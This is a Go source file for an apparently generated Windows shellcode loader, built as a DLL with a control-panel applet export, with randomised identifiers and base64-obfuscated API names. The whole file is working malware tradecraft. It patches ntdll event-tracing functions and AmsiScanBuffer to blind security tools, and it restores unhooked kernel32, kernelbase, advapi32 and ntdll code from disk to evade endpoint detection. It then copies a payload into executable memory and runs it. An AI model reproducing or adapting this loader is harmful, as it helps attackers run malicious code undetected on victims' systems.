package main import "C" import ( "debug/pe" "encoding/base64" "encoding/hex" "XNlPgtsOOS/XNlPgtsOOS" "strconv" "fmt" "io/ioutil" "syscall" "unsafe" "golang.org/x/sys/windows" "golang.org/x/sys/windows/registry" ) const ( oZittvDU= 0x1F0FFF ) var _ unsafe.Pointer var ( IrIzwHU uint16 Zkhzr uint16 uAIeyq int = 4 ) func vwCRMZ() string { zpwcOUWx, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) MmDUMDi, _, _ := zpwcOUWx.GetStringValue("CurrentVersion") eKULQZ, _, err := zpwcOUWx.GetIntegerValue("CurrentMajorVersionNumber") if err == nil{ //lvzAc, _, _ := zpwcOUWx.GetIntegerValue("CurrentMinorVersionNumber") MmDUMDi = strconv.FormatUint(eKULQZ, 10) } defer zpwcOUWx.Close() if MmDUMDi == "10" { IrIzwHU = 0x18 Zkhzr = 0x50 } else if MmDUMDi == "6.3" { IrIzwHU = 0x17 Zkhzr = 0x4f } else if MmDUMDi == "6.2" { IrIzwHU = 0x16 Zkhzr = 0x4e } else if MmDUMDi == "6.1" { IrIzwHU = 0x15 Zkhzr= 0x4d } return MmDUMDi } func hrWqiEf(qxApf string,) string { var Axda []byte Axda, _ = base64.StdEncoding.DecodeString(qxApf) XtJpUzuR := 1 for i := 1; i < uAIeyq; i++ { Axda, _ = base64.StdEncoding.DecodeString(string(Axda)) XtJpUzuR += i } return string(Axda) } const ( gyQJRddX= 997 ) var gNnwu error = syscall.Errno(gyQJRddX) var ROpDNOHa = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc(hrWqiEf("Vm1wT1MyTkhVa2hXYkVacVlsUnNjVmRzYUU5bGJGSllWbTVTYVUwd2J6RT0=")) func woVS(ZZnKC uintptr, tnpcxr uintptr, sWBYxHsr *byte, gwHAR uintptr, MljXN *uintptr) (err error) { r1, _, e1 := syscall.Syscall6(ROpDNOHa.Addr(), 5, uintptr(ZZnKC), uintptr(tnpcxr), uintptr(unsafe.Pointer(sWBYxHsr)), uintptr(gwHAR), uintptr(unsafe.Pointer(MljXN)), 0) if r1 == 0 { if e1 != 0 { err = DhYnQ(e1) } else { err = syscall.EINVAL } } return } func DhYnQ(e syscall.Errno) error { switch e { case 0: return nil case gyQJRddX: return gNnwu } return e } var LVifLfR = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(hrWqiEf("Vld4b1UwMHhVblJQVkVKb1ZqRndkMWRVU2tkTlIwWllUMWhXVm1KV1duVlpWbWhQVFVad1dWTlVNRDA9")) var wdIp = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(hrWqiEf("Vld4b1UwMHhTbGxYYlhocFlteEtWRmRzWkd0alIwMTZWVzE0YWxwNk1Eaz0=")) var lKZP = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(hrWqiEf("Vld4b1UwMHhTbGxYYlhocFlteEtXVmt5TVhOTlJuQldWMnBHYVZJell6az0=")) var gxlGmSy = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(hrWqiEf("Vld4b1UwMHhTbGxYYlhocFlteEtXVmt5TVhOTlJuQlNVRlF3UFE9PQ==")) func QayGopY() { CgjR := uintptr(0xffffffffffffffff) LiuvgoFj := []uintptr{ LVifLfR.Addr(), wdIp.Addr(), lKZP.Addr(), gxlGmSy.Addr()} for i, _ := range LiuvgoFj { pidDPP, _ := hex.DecodeString("4833C0C3") var eShYHC uintptr MxmHZl := len(pidDPP) woVS(CgjR, LiuvgoFj[i], &pidDPP[0], uintptr(uint32(MxmHZl)), &eShYHC) } } func mEAnTgY(CgjR windows.Handle) { LiuvgoFj := []uintptr{ LVifLfR.Addr(), wdIp.Addr(), lKZP.Addr(), gxlGmSy.Addr()} for i, _ := range LiuvgoFj { pidDPP, _ := hex.DecodeString("4833C0C3") var eShYHC uintptr MxmHZl := len(pidDPP) woVS(uintptr(CgjR), LiuvgoFj[i], &pidDPP[0], uintptr(uint32(MxmHZl)), &eShYHC) } } func kDfVDv() { var xNhwMVzk uint64 xNhwMVzk = 0xffffffffffffffff aylVCZ, _ := windows.LoadLibrary(string([]byte{'a','m','s','i','.','d','l','l'})) MhJoRuS, _ := windows.GetProcAddress(aylVCZ, string([]byte{'a','m','s','i','S','c','a','n','B','u','f','f','e','r'})) JetpOpI, _ := hex.DecodeString("B857000780C3") var bhDuCJ uintptr udYFJNWK := len(JetpOpI) woVS(uintptr(xNhwMVzk), uintptr(uint(MhJoRuS)), &JetpOpI[0], uintptr(uint32(udYFJNWK)), &bhDuCJ) } var procReadProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("ReadProcessMemory") func TXvxEUN() uintptr { var funcNtAllocateVirtualMemory = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l'})).NewProc("NtAllocateVirtualMemory") handle := uintptr(0xffffffffffffffff) num := 2 var add uintptr AllAddr := funcNtAllocateVirtualMemory.Addr() for i := 0; i < 20; i++ { rawr, _, _ := ReadProcessMemory(handle, AllAddr+uintptr(i), uintptr(num)) f := fmt.Sprintf("%0x", rawr) if f == "0f05" { add = AllAddr + uintptr(i) return add } } return add } func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, nSize uintptr) (lpBuffer []uint8, lpNumberOfBytesRead int, ok bool) { var nBytesRead int buf := make([]uint8, nSize) ret, _, _ := procReadProcessMemory.Call( uintptr(hProcess), lpBaseAddress, uintptr(unsafe.Pointer(&buf[0])), nSize, uintptr(unsafe.Pointer(&nBytesRead)), ) return buf, nBytesRead, ret != 0 } //export CPlApplet func CPlApplet() { Run() } func main() { } //export Run func Run() { QayGopY() kDfVDv() MmDUMDi := vwCRMZ() if MmDUMDi == "10" { PTMxndUbUjpSeC() } QayGopY() TVYRyzPhwIzF := XNlPgtsOOS.RhYrvYXfyyd() GwhnYSpWCVtCNrrSZ(TVYRyzPhwIzF) } func GwhnYSpWCVtCNrrSZ(TVYRyzPhwIzF []byte){ KcFqmRanPQuADGJC := windows.NewLazySystemDLL("ntdll.dll") jVAVJjPLWTaC := windows.NewLazySystemDLL("kernel32") qhlVxadBYgBz := KcFqmRanPQuADGJC.NewProc("RtlCopyMemory") leGxcpcShT := jVAVJjPLWTaC.NewProc("VirtualAlloc") var lpBPhxOOqrtHLB, ccDuXXoUVeG uintptr var brDsotrpCzuEl uintptr rfDTyNIlxa := uintptr(0xffffffffffffffff) htxynQqfhz := uintptr(len(TVYRyzPhwIzF)) ccDuXXoUVeG = 0x40 lpBPhxOOqrtHLB = 0x3000 whObUqcQcW, _, _ := leGxcpcShT.Call(0, uintptr(len(TVYRyzPhwIzF)), lpBPhxOOqrtHLB, ccDuXXoUVeG) qhlVxadBYgBz.Call(whObUqcQcW, (uintptr)(unsafe.Pointer(&TVYRyzPhwIzF[0])), uintptr(len(TVYRyzPhwIzF))) XNlPgtsOOS.OPHFMwKhSKIsnVtDwT( Zkhzr, rfDTyNIlxa, (*uintptr)(unsafe.Pointer(&whObUqcQcW)), &htxynQqfhz, 0x20, &brDsotrpCzuEl, ) syscall.Syscall(whObUqcQcW, 0, 0, 0, 0) } func PTMxndUbUjpSeC() error { iodQEAqMPMXC := []string{string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'}), string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})} for i, _ := range iodQEAqMPMXC { eILAHhaecJgZTmewBR, oESItGYwhtxqkSHppm := ioutil.ReadFile(iodQEAqMPMXC[i]) if oESItGYwhtxqkSHppm != nil { return oESItGYwhtxqkSHppm } wAWjWRWCFwLYxWmVQ, oESItGYwhtxqkSHppm := pe.Open(iodQEAqMPMXC[i]) if oESItGYwhtxqkSHppm != nil { return oESItGYwhtxqkSHppm } NQsvfvXFInOHUibRYC := wAWjWRWCFwLYxWmVQ.Section(string([]byte{'.', 't', 'e', 'x', 't'})) IrIYZrvacRxAApNGq := eILAHhaecJgZTmewBR[NQsvfvXFInOHUibRYC.Offset:NQsvfvXFInOHUibRYC.Size] OAsplgIXbFHfvgK, oESItGYwhtxqkSHppm := windows.LoadDLL(iodQEAqMPMXC[i]) if oESItGYwhtxqkSHppm != nil { return oESItGYwhtxqkSHppm } JuIYanVzSDura := OAsplgIXbFHfvgK.Handle zFCJrdEMsydxnE := uintptr(JuIYanVzSDura) tKEQHVFjDJiFWBRxF := uint(zFCJrdEMsydxnE) + uint(NQsvfvXFInOHUibRYC.VirtualAddress) ZZzZvfnNQK := uintptr(len(IrIYZrvacRxAApNGq)) LcTsSCAzBJTh := uintptr(0xffffffffffffffff) var SzdHhHNCETxLVq uintptr aHJAAwwNUBEJnUkhz := TXvxEUN() FuBKmLXyCLGfwUOu, _ := XNlPgtsOOS.FplUuHrZNwb( Zkhzr, aHJAAwwNUBEJnUkhz, LcTsSCAzBJTh, (*uintptr)(unsafe.Pointer(&tKEQHVFjDJiFWBRxF)), &ZZzZvfnNQK, 0x40, &SzdHhHNCETxLVq, ) if FuBKmLXyCLGfwUOu != 0 { } for i := 0; i < len(IrIYZrvacRxAApNGq); i++ { ZmciEiWNgHo := uintptr(tKEQHVFjDJiFWBRxF + uint(i)) tFUgHRNVcPtu := (*[1]byte)(unsafe.Pointer(ZmciEiWNgHo)) (*tFUgHRNVcPtu)[0] = IrIYZrvacRxAApNGq[i] } FuBKmLXyCLGfwUOu, _ = XNlPgtsOOS.FplUuHrZNwb( Zkhzr, aHJAAwwNUBEJnUkhz, LcTsSCAzBJTh, (*uintptr)(unsafe.Pointer(&tKEQHVFjDJiFWBRxF)), &ZZzZvfnNQK, 0x20, &SzdHhHNCETxLVq, ) } return nil }